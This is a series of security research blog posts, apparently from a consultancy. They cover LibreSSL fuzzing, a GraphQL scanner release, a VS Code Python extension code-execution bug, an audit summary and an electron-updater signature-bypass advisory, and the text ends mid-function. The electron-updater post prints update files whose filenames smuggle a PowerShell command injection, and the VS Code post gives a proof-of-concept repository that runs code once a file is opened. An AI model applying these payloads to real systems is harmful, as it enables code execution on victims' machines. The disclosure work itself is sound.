As a Void Linux maintainer, I’m a long time LibreSSL user and proponent. LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014 with the goals of modernizing the codebase, improving security, and applying best practice development procedures. The motivation for this kind of fork arose after the discovery of the Heartbleed vulnerability.

LibreSSL’s efforts are aimed at removing code considered useless for the target platforms, removing code smells and including additional secure defaults at the cost of compatibility. The LibreSSL codebase is now nearly 70% the size of OpenSSL (237558 cloc vs 335485 cloc), while implementing a similar API on all the major modern operating systems.

Forking is considered a Bad Thing not merely because it implies a lot of wasted effort in the future, but because forks tend to be accompanied by a great deal of strife and acrimony between the successor groups over issues of legitimacy, succession, and design direction. There is serious social pressure against forking. As a result, major forks (such as the Gnu-Emacs/XEmacs split, the fissioning of the 386BSD group into three daughter projects, and the short-lived GCC/EGCS split) are rare enough that they are remembered individually in hacker folklore.

Eric Raymond, Homesteading the Noosphere

The LibreSSL effort was generally well received and it now replaces OpenSSL on OpenBSD, on macOS since 10.11 and on many Linux distributions. In the first few years, 6 critical vulnerabilities were found in OpenSSL and none of them affected LibreSSL.

Historically, these kinds of forks tend to spawn competing projects which cannot later exchange code, splitting the potential pool of developers between them. However, the LibreSSL team has largely demonstrated the ability to merge and implement new OpenSSL code and bug fixes, all the while slimming down the original source code and cutting down on rarely used or dangerous features.

OSS-Fuzz Selection

While the development of LibreSSL appears to be a story with a happy ending, the integration of fuzzing and security auditing into the project was much less so. The Heartbleed vulnerability was a wakeup call for the industry to tackle the security of the libraries that make up the core of the internet. In particular, Google launched the OSS-Fuzz project. OSS-Fuzz is an effort to provide, for free, Google infrastructure to perform fuzzing against the most popular open source libraries. One of the first projects to undergo these tests was in fact OpenSSL.

Fuzz testing is a well-known technique for uncovering programming errors in software. Many of these detectable errors, like buffer overflows, can have serious security implications. OpenSSL included fuzzers in c38bb72797916f2a0ab9906aad29162ca8d53546 and was integrated into OSS-Fuzz later in 2016.

commit c38bb72797916f2a0ab9906aad29162ca8d53546
Refs: OpenSSL_1_1_0-pre5-217-gc38bb72797
Author:     Ben Laurie <ben@links.org>
AuthorDate: Sat Mar 26 17:19:14 2016 +0000
Commit:     Ben Laurie <ben@links.org>
CommitDate: Sat May 7 18:13:54 2016 +0100
    Add fuzzing!

Since LibreSSL and OpenSSL share most of their codebase, with LibreSSL mainly implementing a secure subset of OpenSSL, we thought porting the OpenSSL fuzzers to LibreSSL would be a fun and useful project. Moreover, this resulted in the discovery of several memory corruption bugs.

Note that the following details do not replace the official OSS-Fuzz guide, but will instead help in selecting a good target project for OSS-Fuzz integration. Generally speaking, applying for a new OSS-Fuzz integration proceeds in four logical steps:

Selection: Select a new project that isn’t yet ported. Check for existing projects in OSS-Fuzz projects directory. For example, check if somebody already tried to perform the same integration in a pull-request.
Feasibility: Check the feasibility and the security implications of that project on the Internet. As a general guideline, the more impact the project has on the everyday usage of the web the bigger the bounty will be. At the time of writing, OSS-Fuzz bounties are up to $20,000 with the Google patch-reward program. On the other hand, good coverage is expected to be developed for any integration. For this reason it is easier to integrate projects that already employ fuzzers.
Technical integration: Follow the super detailed getting started guide to perform an initial integration.
Profit: Apply for the Google patch-reward program. Profit?!

We were awarded a bounty, and we helped to protect the Internet just a little bit more. You should do it too!

Heartbreak

After a crash is found, the OSS-Fuzz infrastructure provides a minimized test case which can be inspected by an analyst. The issue was found in the ASN1 parser. ASN1 is a formal notation used for describing data transmitted by telecommunications protocols, regardless of language implementation and physical representation of these data, whether complex or very simple. Coincidentally, it is employed for X.509 certificates, which represent the technical basis for building public-key infrastructure.

Passing our test case 0202 ff25 through dumpasn1, it’s possible to see how it errors out, saying that the integer of length 2 (bytes) is encoded with a negative value. This is not allowed in ASN1, and it should not even be allowed in LibreSSL. However, as discovered by OSS-Fuzz, this test crashes the LibreSSL parser.

$ xxd ./test
00000000: 0202 ff25                                ...%
$ dumpasn1 ./test
  0   2: INTEGER 65317
       :   Error: Integer is encoded as a negative value.

0 warnings, 1 error.
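
The four bytes of the test case can also be decoded by hand: tag 0x02 (INTEGER), length 0x02, content ff25. The minimal Python sketch below only handles short-form lengths, and `parse_der_integer` is a name made up for this example. It shows both readings of the content bytes: unsigned, as printed by dumpasn1, and two’s complement.

```python
def parse_der_integer(data: bytes) -> dict:
    """Decode a DER INTEGER with a short-form length (sketch only)."""
    tag, length = data[0], data[1]
    if tag != 0x02:
        raise ValueError("not an INTEGER")
    if length >= 0x80:
        raise ValueError("long-form lengths are not handled in this sketch")
    content = data[2:2 + length]
    if len(content) != length:
        raise ValueError("truncated content")
    return {
        "unsigned": int.from_bytes(content, "big"),
        "signed": int.from_bytes(content, "big", signed=True),
        # The top bit of the first content byte is the sign bit.
        "negative": bool(content) and (content[0] & 0x80) != 0,
    }


print(parse_der_integer(bytes.fromhex("0202ff25")))
# {'unsigned': 65317, 'signed': -219, 'negative': True}
```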

Since the LibreSSL implementation was not guarded against negative integers, trying to convert the crafted negative ASN1 integer to the internal BIGNUM representation causes an uncontrolled over-read.

AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x00000058a308 bp 0x7ffd3e8b7bb0 sp 0x7ffd3e8b7b40 T0)
    ==1==The signal is caused by a READ memory access.
    SCARINESS: 20 (wild-addr-read)
        #0 0x58a307 in BN_bin2bn libressl/crypto/bn/bn_lib.c:601:19
        #1 0x6cd5ac in ASN1_INTEGER_to_BN libressl/crypto/asn1/a_int.c:456:13
        #2 0x6a39dd in i2s_ASN1_INTEGER libressl/crypto/x509v3/v3_utl.c:175:16
        #3 0x571827 in asn1_print_integer_ctx libressl/crypto/asn1/tasn_prn.c:457:6
        #4 0x571827 in asn1_primitive_print libressl/crypto/asn1/tasn_prn.c:556
        #5 0x571827 in asn1_item_print_ctx libressl/crypto/asn1/tasn_prn.c:239
        #6 0x57069a in ASN1_item_print libressl/crypto/asn1/tasn_prn.c:195:9
        #7 0x4f4db0 in FuzzerTestOneInput libressl.fuzzers/asn1.c:282:13
        #8 0x7fd3f5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/libfuzzer/FuzzerLoop.cpp:529:15
        #9 0x7bd746 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/libfuzzer/FuzzerDriver.cpp:286:6
        #10 0x7c9273 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/libfuzzer/FuzzerDriver.cpp:715:9
        #11 0x7bcdbc in main /src/libfuzzer/FuzzerMain.cpp:19:10
        #12 0x7fa873b8282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/libc-start.c:291
        #13 0x41db18 in _start

This “wild” address read may be employed by malicious actors to leak memory in security-sensitive contexts. The LibreSSL maintainers not only addressed the vulnerability promptly but also included an additional protection to guard against missing ASN1_PRIMITIVE_FUNCS in 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9.

commit 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9
Author: jsing <>
Date:   Mon Apr 1 15:48:04 2019 +0000

    Require all ASN1_PRIMITIVE_FUNCS functions to be provided.

    If an ASN.1 item provides its own ASN1_PRIMITIVE_FUNCS functions, require
    all functions to be provided (currently excluding prim_clear). This avoids
    situations such as having a custom allocator that returns a specific struct
    but then is then printed using the default primative print functions, which
    interpret the memory as a different struct.

Closing the door to strangers

Fuzzing, despite being seen as one of the easiest ways to discover security vulnerabilities, still works very well. Even if OSS-Fuzz is especially tailored to open source projects, it can also be adapted to closed source projects. In fact, at the cost of implementing the LLVMFuzzerTestOneInput interface, it integrates all the latest and greatest clang/llvm fuzzer technology. Just as the Dockerfile language brought enormous improvements on the devops side, we strongly believe that the OSS-Fuzz fuzzing interface definition language should be employed in every non-trivial closed source project too. If you need help, contact us for your security automation projects!

As always, this research was funded thanks to the 25% research time offered at Doyensec. Tune in again for new episodes!

InQL Scanner

2020-03-26T00:00:00+01:00

InQL is now public!

As a part of our continuing security research journey, we started developing an internal tool to speed up GraphQL security testing efforts. We’re excited to announce that InQL is available on GitHub.

InQL can be used as a stand-alone script, or as a Burp Suite extension (available for both Professional and Community editions). The tool leverages GraphQL’s built-in introspection query to dump queries, mutations, subscriptions, fields and arguments, and to retrieve default and custom objects. This information is collected and then processed to construct API endpoint documentation in the form of HTML and JSON schema. InQL is also able to generate query templates for all the known types. The scanner can identify basic query types and replace them with placeholders, rendering the query ready to be ingested by a remote API endpoint.

We believe this feature, combined with the ability to send query templates to Burp’s Repeater, will decrease the time to exploit vulnerabilities in GraphQL endpoints and drastically lower the bar for security research against GraphQL tech stacks.
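
To give an idea of what the introspection step involves, here is a minimal Python sketch. It is not InQL’s code: the query is a trimmed-down introspection query, `build_request_body` and `list_operations` are hypothetical helpers, and the response is a hand-written sample rather than output from a real endpoint.

```python
import json
from typing import Dict, List

# Trimmed-down introspection query: root type names plus the fields of every type.
INTROSPECTION_QUERY = """
query {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      name
      fields { name args { name } }
    }
  }
}
"""


def build_request_body() -> bytes:
    """JSON body to POST to a GraphQL endpoint."""
    return json.dumps({"query": INTROSPECTION_QUERY}).encode("utf-8")


def list_operations(response: dict) -> Dict[str, List[str]]:
    """Extract the field names exposed by the query and mutation root types."""
    schema = response["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    operations = {}
    for kind in ("queryType", "mutationType"):
        root = schema.get(kind)
        if root is None:
            continue  # the schema does not define this root type
        fields = types.get(root["name"], {}).get("fields") or []
        operations[kind] = [field["name"] for field in fields]
    return operations


# Hand-written sample response, for illustration only.
sample = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": None,
    "types": [
        {"name": "Query", "fields": [{"name": "Page", "args": []},
                                     {"name": "Media", "args": []}]},
        {"name": "String", "fields": None},
    ],
}}}
print(list_operations(sample))
```

Each name returned this way is a candidate for a query template.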

InQL Scanner Burp Suite Extension

Using the inql extension for Burp Suite, you can:

Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common utilities)
Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
Leverage the template generation by sending those requests to Burp’s Repeater tool
Configure the tool by using a custom settings tab

Enabling InQL Scanner Extension in Burp

To use inql in Burp Suite, import the Python extension:

Download the latest Jython Jar
Download the latest version of InQL scanner
Start Burp Suite
Extender Tab > Options > Python Environment > Set the location of Jython standalone JAR
Extender Tab > Extension > Add > Extension Type > Select Python
Extension File > Set the location of inql_burp.py > Next
The output window should display the following message: InQL Scanner Started!

In the near future, we might consider integrating the extension within Burp’s BApp Store.

InQL Demo

We completely revamped the command line interface in light of InQL’s public release. This interface retains most of the Burp plugin’s functionality.

It is now possible to install the tool with pip and run it through your favorite CLI.

pip install inql

For all supported options, check the command line help:

usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
            [--header HEADERS HEADERS] [-d] [--generate-html]
            [--generate-schema] [--generate-queries] [--insecure]
            [-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET             Remote GraphQL Endpoint (https://<Target_IP>/graphql)
  -f SCHEMA_JSON_FILE   Schema file in JSON format
  -k KEY                API Authentication Key
  -p PROXY              IP of web proxy to go through (http://127.0.0.1:8080)
  --header HEADERS HEADERS
  -d                    Replace known GraphQL arguments types with placeholder
                        values (useful for Burp Suite)
  --generate-html       Generate HTML Documentation
  --generate-schema     Generate JSON Schema Documentation
  --generate-queries    Generate Queries
  --insecure            Accept any SSL/TLS certificate
  -o OUTPUT_DIRECTORY   Output Directory

An example query can be performed against one of the numerous exposed APIs, e.g., the anilist.co endpoint:

$ inql -t https://anilist.co/graphql
[+] Writing Queries Templates
 |  Page
 |  Media
 |  MediaTrend
 |  AiringSchedule
 |  Character
 |  Staff
 |  MediaList
 |  MediaListCollection
 |  GenreCollection
 |  MediaTagCollection
 |  User
 |  Viewer
 |  Notification
 |  Studio
 |  Review
 |  Activity
 |  ActivityReply
 |  Following
 |  Follower
 |  Thread
 |  ThreadComment
 |  Recommendation
 |  Like
 |  Markdown
 |  AniChartUser
 |  SiteStatistics
[+] Writing Queries Templates
 |  UpdateUser
 |  SaveMediaListEntry
 |  UpdateMediaListEntries
 |  DeleteMediaListEntry
 |  DeleteCustomList
 |  SaveTextActivity
 |  SaveMessageActivity
 |  SaveListActivity
 |  DeleteActivity
 |  ToggleActivitySubscription
 |  SaveActivityReply
 |  DeleteActivityReply
 |  ToggleLike
 |  ToggleLikeV2
 |  ToggleFollow
 |  ToggleFavourite
 |  UpdateFavouriteOrder
 |  SaveReview
 |  DeleteReview
 |  RateReview
 |  SaveRecommendation
 |  SaveThread
 |  DeleteThread
 |  ToggleThreadSubscription
 |  SaveThreadComment
 |  DeleteThreadComment
 |  UpdateAniChartSettings
 |  UpdateAniChartHighlights
[+] Writing Queries Templates
[+] Writing Queries Templates

The resulting HTML documentation page will contain details for all available queries, mutations, and subscriptions.
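To illustrate the kind of data such templates and documentation are derived from, here is a minimal sketch that lists the query and mutation names found in a standard GraphQL introspection result. It is not InQL's implementation: the helper name `list_operations` and the trimmed `SAMPLE` response are assumptions made purely for illustration.

```python
from typing import Dict, List


def list_operations(introspection: dict) -> Dict[str, List[str]]:
    """Return the field names of the root query and mutation types.

    `introspection` is the parsed JSON response to a standard GraphQL
    introspection query (the `__schema` object defined by the GraphQL spec).
    """
    schema = introspection["data"]["__schema"]
    # Index every type by name so the root types can be looked up directly.
    types_by_name = {t["name"]: t for t in schema["types"]}

    result: Dict[str, List[str]] = {}
    for label, key in (("queries", "queryType"), ("mutations", "mutationType")):
        root = schema.get(key)  # may be None when the API exposes no mutations
        if not root:
            result[label] = []
            continue
        fields = types_by_name.get(root["name"], {}).get("fields") or []
        result[label] = [f["name"] for f in fields]
    return result


# Hypothetical, heavily trimmed introspection result used only for illustration.
SAMPLE = {
    "data": {
        "__schema": {
            "queryType": {"name": "Query"},
            "mutationType": {"name": "Mutation"},
            "types": [
                {"name": "Query", "fields": [{"name": "Page"}, {"name": "Media"}]},
                {"name": "Mutation", "fields": [{"name": "UpdateUser"}]},
            ],
        }
    }
}

for kind, names in list_operations(SAMPLE).items():
    print(kind, names)
```

Each name returned this way corresponds to one entry in the listing printed by the CLI above.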

Stay tuned!

Back in May 2018, we published a blog post on GraphQL security where we focused on vulnerabilities and misconfigurations. As part of that research effort, we developed a simple script to query GraphQL endpoints. After the publication, we received a lot of positive feedback that sparked even more interest in further developing the concept. Since then, we have refined our GraphQL testing methodologies and tooling. As part of our standard customer engagements, we often perform testing against GraphQL technologies, hence we expect to continue our research efforts in this space. Going forward, we will keep improving detection and make the tool more stable.

This project was made with love in the Doyensec Research island.

Don't Clone That Repo: Visual Studio Code^2 Execution

2020-03-16T00:00:00+01:00

This is the story of how I stumbled upon a code execution vulnerability in the Visual Studio Code Python extension. It currently has 16.5M+ installs reported in the extension marketplace.

The bug

Some time ago I was reviewing a client’s Python web application when I noticed a warning

Fair enough, I thought, I just need to install pylint.

To my surprise, after running pip install --user pylint the warning was still there. Then I noticed venv-test displayed on the lower-left of the editor window. Did VSCode just automatically select the Python environment from the project folder?! To confirm my hypothesis, I installed pylint inside that virtualenv and the warning disappeared.

This seemed sketchy, so I added os.exec("/Applications/Calculator.app") to one of pylint’s source files and a calculator spawned. Easiest code execution ever!

VSCode’s behaviour is dangerous because the virtualenv found in a project folder is activated without user interaction. Adding a malicious folder to the workspace and opening a Python file inside the project is sufficient to trigger the vulnerability. Once a virtualenv is found, VSCode saves its path in .vscode/settings.json. If that file is already present in the cloned repo, its value is loaded and trusted without asking the user. In practice, it is possible to hide the virtualenv in any repository.
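Before opening an untrusted repository, it can help to check whether it ships workspace settings or a bundled virtualenv. The following is a minimal sketch under stated assumptions: the function name `find_interpreter_overrides` is hypothetical, interpreter-related settings are assumed to live under keys starting with `python.`, and only environments created by the standard `venv` module (which writes a `pyvenv.cfg` marker) are detected.

```python
import json
import os
from typing import List


def find_interpreter_overrides(repo_root: str) -> List[str]:
    """Report workspace settings and virtualenvs shipped inside a repository."""
    findings: List[str] = []
    for dirpath, dirnames, filenames in os.walk(repo_root):
        if ".git" in dirnames:
            dirnames.remove(".git")  # do not descend into git internals
        # pyvenv.cfg is the marker file written by `python -m venv`.
        if "pyvenv.cfg" in filenames:
            findings.append(f"virtualenv: {dirpath}")
        if os.path.basename(dirpath) == ".vscode" and "settings.json" in filenames:
            path = os.path.join(dirpath, "settings.json")
            try:
                with open(path, encoding="utf-8") as fh:
                    settings = json.load(fh)
            except (OSError, ValueError):
                # settings.json may contain comments, which json cannot parse;
                # flag the file for manual review instead of ignoring it.
                findings.append(f"unparsed settings: {path}")
                continue
            if not isinstance(settings, dict):
                continue
            for key, value in settings.items():
                # Assumption: interpreter-related keys start with "python."
                if key.startswith("python."):
                    findings.append(f"setting: {key} = {value!r} ({path})")
    return findings
```

Calling `find_interpreter_overrides("path/to/clone")` returns a list of findings to review by hand; an empty list only means nothing matched these simple heuristics.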

The behavior is not in VSCode core, but rather in the Python extension. We contacted Microsoft on 2nd October 2019; however, the vulnerability is still not patched at the time of writing. Given that the industry-standard 90 days have expired and the issue is exposed in a GitHub issue, we have decided to disclose the vulnerability.

PoC || GTFO

You can try for yourself! This innocuous PoC repo opens Calculator.app on macOS:

1) git clone git@github.com:doyensec/VSCode_PoC_Oct2019.git
2) add the cloned repo to the VSCode workspace
3) open test.py in VSCode

This repo contains a “malicious” settings.json which selects the virtualenv in totally_innocuous_folder/no_seriously_nothing_to_see_here.

In a bare-bones repo like this, noticing the virtualenv might be easy, but it is easy to see how one might miss it in a real-life codebase. Moreover, it is certainly undesirable that VSCode executes code from a folder just because a Python file was opened in the editor.

Disclosure Timeline

2nd Oct 2019: Issue discovered
2nd Oct 2019: Security advisory sent to Microsoft
8th Oct 2019: Response from Microsoft, issue opened on vscode-python bug tracker #7805
7th Jan 2020: Asked Microsoft for a resolution timeframe
8th Jan 2020: Microsoft replies that the issue should be fixed by mid-April 2020
16th Mar 2020: Doyensec advisory and blog post are published

Edits

17th Mar 2020: The blogpost stated that the extension is bundled by default with the editor. That is not the case, and we removed that claim. Thanks @justinsteven for pointing this out!

2019 Gravitational Security Audit Results

2020-03-02T00:00:00+01:00

This is a re-post of the original blogpost published by Gravitational on the 2019 security audit results for their two products: Teleport and Gravity.

You can download the security testing deliverables for Teleport and Gravity from our research page.

We would like to take this opportunity to thank the Gravitational engineering team for choosing Doyensec and working with us to ensure a successful project execution.

We now live in an era where the security of all layers of the software stack is immensely important, and simply open sourcing a code base is not enough to ensure that security vulnerabilities surface and are addressed. At Gravitational, we see it as a necessity to engage a third party that specializes in acting as an adversary, and provide an independent analysis of our sources.

This year, we had an opportunity to work with Doyensec, which provided the most thorough independent analysis of Gravity and Teleport to date. The Doyensec team did an amazing job at finding areas where we are weak in the Gravity code base. Here is the full report for Teleport and Gravity; and you can find all of our security audits here.

Gravity

Gravity has a lot of moving components. As a Kubernetes distribution and distributed system for delivering Kubernetes in many unique environments, the product’s attack surface isn’t small.

All flaws considered medium or higher except for one were patched and released as they were reported by the Doyensec team, and we’ve also been working towards addressing the more minor and informational issues as part of our normal release process. Out of the four vulnerabilities rated as high by Doyensec, we’ve managed to patch three of them, and the fourth relies on a significant investment in design and tooling change which we’ll go into in a moment.

Insecure Decompression of Application Bundles

Part of what Gravity does is package applications into an installer that can be taken to on-prem and air-gapped environments, installing a fully working Kubernetes cluster and application without dependencies. As such, we build our artifacts as a tar file - a virtually universally supported archive format.

Along with this, our own tooling is able to process and accept these tar archives, which is where we run into problems. Golang’s tar handling code is extremely basic and this allows very old tar handling problems to surface, granting specially crafted tar files the ability to overwrite arbitrary system files and allowing for remote code execution. Our tar handling has now been hardened against such vulnerabilities, and we’ll write a post digging into just this topic soon.
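To make the class of problem concrete, here is a minimal sketch of hardened archive extraction. It is written in Python rather than Go and is not Gravity's actual fix; the function name `safe_extract` and the policy of rejecting every link or special file are assumptions chosen for illustration.

```python
import os
import shutil
import tarfile


def safe_extract(archive: tarfile.TarFile, dest: str) -> None:
    """Extract `archive` into `dest`, refusing entries that could escape it."""
    dest_root = os.path.realpath(dest)
    members = archive.getmembers()

    # First pass: validate every entry before writing anything to disk.
    for member in members:
        # Only regular files and directories are accepted; symlinks, hard
        # links and device nodes are rejected outright in this sketch.
        if not (member.isfile() or member.isdir()):
            raise ValueError(f"refusing non-regular entry: {member.name}")
        target = os.path.realpath(os.path.join(dest_root, member.name))
        # An absolute name or a "../" sequence resolves outside dest_root.
        if os.path.commonpath([dest_root, target]) != dest_root:
            raise ValueError(f"refusing path outside destination: {member.name}")

    # Second pass: write the validated entries.
    for member in members:
        target = os.path.realpath(os.path.join(dest_root, member.name))
        if member.isdir():
            os.makedirs(target, exist_ok=True)
            continue
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with archive.extractfile(member) as src, open(target, "wb") as dst:
            shutil.copyfileobj(src, dst)
```

Validating the whole archive before extracting anything means a malicious entry near the end cannot leave a half-written installation behind.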

Remote Code Execution via Malicious Auth Connector

When using our cli tools to do single sign on, we launch a browser for the user to the single sign on page. This was done by passing a url from the server to the client to tell it where the SSO page is located.

Someone with access to the server is able to change the url to be a non http(s) url and execute programs locally on the cli host. We’ve implemented sanitization of the url passed by the server to enforce http(s), and also changed the design of some new features to not require trusting data from a server.
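The scheme check described above can be sketched in a few lines. This is an illustrative Python version, not the code shipped in the Gravitational CLI; `validate_sso_url` and `ALLOWED_SCHEMES` are hypothetical names.

```python
from urllib.parse import urlsplit

# Only web URLs may be handed to the local browser launcher.
ALLOWED_SCHEMES = {"http", "https"}


def validate_sso_url(url: str) -> str:
    """Return `url` unchanged if it is an http(s) URL with a host, else raise."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"refusing to open URL with scheme {parts.scheme!r}")
    if not parts.netloc:
        raise ValueError("refusing to open URL without a host")
    return url
```

The client would call `validate_sso_url()` on the server-supplied value and only pass the result to its browser launcher, so a value such as `file:///Applications/Calculator.app` is rejected before anything is executed.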

Missing ACLs in the API

Perhaps the most embarrassing issue in this list - the API endpoints responsible for managing API tokens were missing authorization ACLs. This allowed for any authenticated user, even those with empty permissions, to access, edit, and create tokens for other users. This would allow for user impersonation and privilege escalation. This vulnerability was quickly addressed by implementing the correct ACLs, and the team is working hard to ensure these types of vulnerabilities do not reoccur.

Missing Signature Verification in Application Bundles

This is the vulnerability we haven’t been able to address so far, as it was never a design objective to protect against this particular vulnerability.

Gravity includes a hub product for enterprise customers that allows for the storage and download of application assets, either for installation or upgrade. In essence, part of the hub product is to act as a file server where a company can store their application, and internally or publicly connect deployed clusters for updates.

The weakness in the model, as has been seen by many public artifact repositories, is that this security model relies on the integrity of the system storing those assets.

While not necessarily a vulnerability on its own, this is a design weakness that doesn’t match the capabilities the security community expects. The security is roughly equivalent to posting a binary build to Github - anyone with the correct access can modify or post malicious assets, and anyone who trusts Github when downloading that asset could be getting a malicious asset. Instead, packages should be signed in some way before being posted to a public download server, and the software should have a method for trusting that updates and installs come from a trusted source.

This is a really difficult problem that many companies have gotten wrong, so it’s not something that Gravitational as an organization is willing to rush a solution for. There are several well known models that we are evaluating, but we’re not at a stage where we have a solution that we’re completely happy with.

In this realm, we’re also going to end-of-life the hub product as the asset storage functionality is not widely used. We’re also going to move the remote access functionality that our customers do care about over to our Teleport product.

Teleport

As we mentioned in the Teleport 4.2 release notes, the most serious issues were centered around the incorrect handling of session data. If an attacker was able to gain valid x509 credentials of a Teleport node, they could use the session recording facility to read/write arbitrary files on the Auth Server or potentially corrupt recorded session data.

These vulnerabilities could only be exploited using credentials from a previously authenticated client. There was no known way to exploit them from outside the cluster as a non-authenticated client.

After the re-assessment, all issues with any direct security impact were addressed. From the report:

In January 2020, Doyensec performed a retesting of the Teleport platform and confirmed the effectiveness of the applied mitigations. All issues with direct security impact have been addressed by Gravitational.

Even though all direct issues were mitigated, there was one issue in the report that continued to bother us and we felt we could do better on: “#6: Session Recording Bypasses”. This is something we had known about for quite some time and something we have been upfront with to users and customers. Session recording is a great feature, however due to the inherent complexity of the problem being solved, bypasses do exist.

Teleport 4.2 introduced a new feature called Enhanced Session Recording that uses eBPF tooling to substantially reduce the bypass gaps that can exist. We’ll have more to share on that soon in the form of another blog post that will go into the technical implementation details for that feature.

Signature Validation Bypass Leading to RCE In Electron-Updater

2020-02-24T00:00:00+01:00

We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw.

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

This software is commonly used to build platform-specific packages for ElectronJs-based applications and it is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting SHA1 & SHA256 hashing algorithms).

A Fail Open Design

As part of a security engagement for one of our customers, we have reviewed the update mechanism performed by Electron Builder, and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check hence leading to remote command execution.

The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes.

To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security:

    execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], {
      timeout: 20 * 1000
    }, (error, stdout, stderr) => {
      try {
        if (error != null || stderr) {
          handleError(logger, error, stderr)
          resolve(null)
          return
        }

        const data = parseOut(stdout)
        if (data.Status === 0) {
          const name = parseDn(data.SignerCertificate.Subject).get("CN")!
          if (publisherNames.includes(name)) {
            resolve(null)
            return
          }
        }

        const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2)
        logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`)
        resolve(result)
      }
      catch (e) {
        logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`)
        resolve(null)
        return
      }
    })

which translates to the following PowerShell command:

powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress"

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker could bypass the entire signature verification by triggering a parse error in the script. This can be easily achieved by using a filename containing a single quote and then by recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).
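For readers without the shell tools at hand, the hash recalculation in the one-liner above (hex SHA-512 digest, converted to raw bytes, then Base64-encoded) can be reproduced as follows. This is a small sketch; the function names are our own.

```python
import base64
import hashlib


def sha512_base64(data: bytes) -> str:
    """Base64 encoding of the raw SHA-512 digest, as produced by the pipeline above."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def sha512_base64_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Same value computed over a file, read in chunks to keep memory use flat."""
    digest = hashlib.sha512()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return base64.b64encode(digest.digest()).decode("ascii")
```

A 64-byte digest always encodes to 88 Base64 characters ending in `==`, which matches the shape of the sha512 values in the update definitions.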

For instance, a malicious update definition would look like:

version: 1.2.3
files:
  - url: v'ulnerable-app-setup-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
    size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, they may leverage the lack of escaping to pull out a trivial command injection:

version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
    size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges.
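The effect of the missing escaping can be reproduced without PowerShell by looking at the command string itself. The sketch below mimics the interpolation in Python; the function names are hypothetical. It also shows the usual way to quote a value for a PowerShell single-quoted string, where a literal single quote is written by doubling it. This only illustrates the quoting rule and is not a complete fix, since the surrounding code would still fail open on errors.

```python
def build_command(path: str) -> str:
    """Mimic the unescaped interpolation described above (illustration only)."""
    return f"Get-AuthenticodeSignature '{path}' | ConvertTo-Json -Compress"


def quote_for_powershell(value: str) -> str:
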